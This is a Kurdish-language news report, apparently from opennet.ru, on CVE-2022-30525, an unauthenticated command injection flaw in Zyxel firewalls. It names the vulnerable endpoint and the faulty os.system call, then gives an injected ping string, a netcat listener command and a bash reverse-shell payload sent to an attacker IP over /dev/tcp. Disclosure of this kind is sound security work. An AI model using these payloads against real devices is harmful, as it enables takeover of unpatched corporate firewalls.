Zehfbûna di dîwarên agir ên Zyxel de ku destûrê dide darvekirina kodê bêyî pejirandinê

Di cîhazên Zyxel ên rêzikên ATP, VPN û USG FLEX de qelsiyek krîtîk (CVE-2022-30525) hatîye nas kirin, ku ji bo organîzekirina xebata dîwarên agir, IDS û VPN di pargîdaniyan de hatî çêkirin, ku destûrê dide êrîşkarek derveyî ku kodê li ser sazûmanê bicîh bike. cîhaza bêyî mafên bikarhêner bêyî pejirandinê. Ji bo ku êrîşek pêk bîne, divê êrîşkar bikaribe bi protokola HTTP/HTTPS serlêdanan ji cîhazê re bişîne. Zyxel di nûvekirina firmware ZLD 5.30 de qelsiya rast kiriye. Li gorî karûbarê Shodan, niha li ser tora gerdûnî 16213 amûrên potansiyel xeternak hene ku bi rêya HTTP/HTTPS daxwazan qebûl dikin.

Operasyon bi şandina emrên taybetî yên sêwirandî ji hilgirê malperê /ztp/cgi-bin/handler re, ku bêyî pejirandinê tê gihîştin, tête kirin. Pirsgirêk ji ber nebûna paqijkirina rast a parametreyên daxwaznameyê dema ku emrên li ser pergalê bi kar tîne bi karanîna banga os.system ku di pirtûkxaneya lib_wan_settings.py de tê bikar anîn û dema ku operasyona setWanPortSt tê xebitandin tê darve kirin.

Bo nimûne, êrîşkarek dikare rêzika “; ping 192.168.1.210;" ku dê bibe sedema pêkanîna fermana "ping 192.168.1.210" li ser pergalê. Ji bo ku hûn xwe bigihînin şêlê fermanê, hûn dikarin "nc -lvnp 1270" li ser pergala xwe bimeşînin, û dûv re bi şandina daxwazek ji cîhazê re bi '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Source: opennet.ru

Add a comment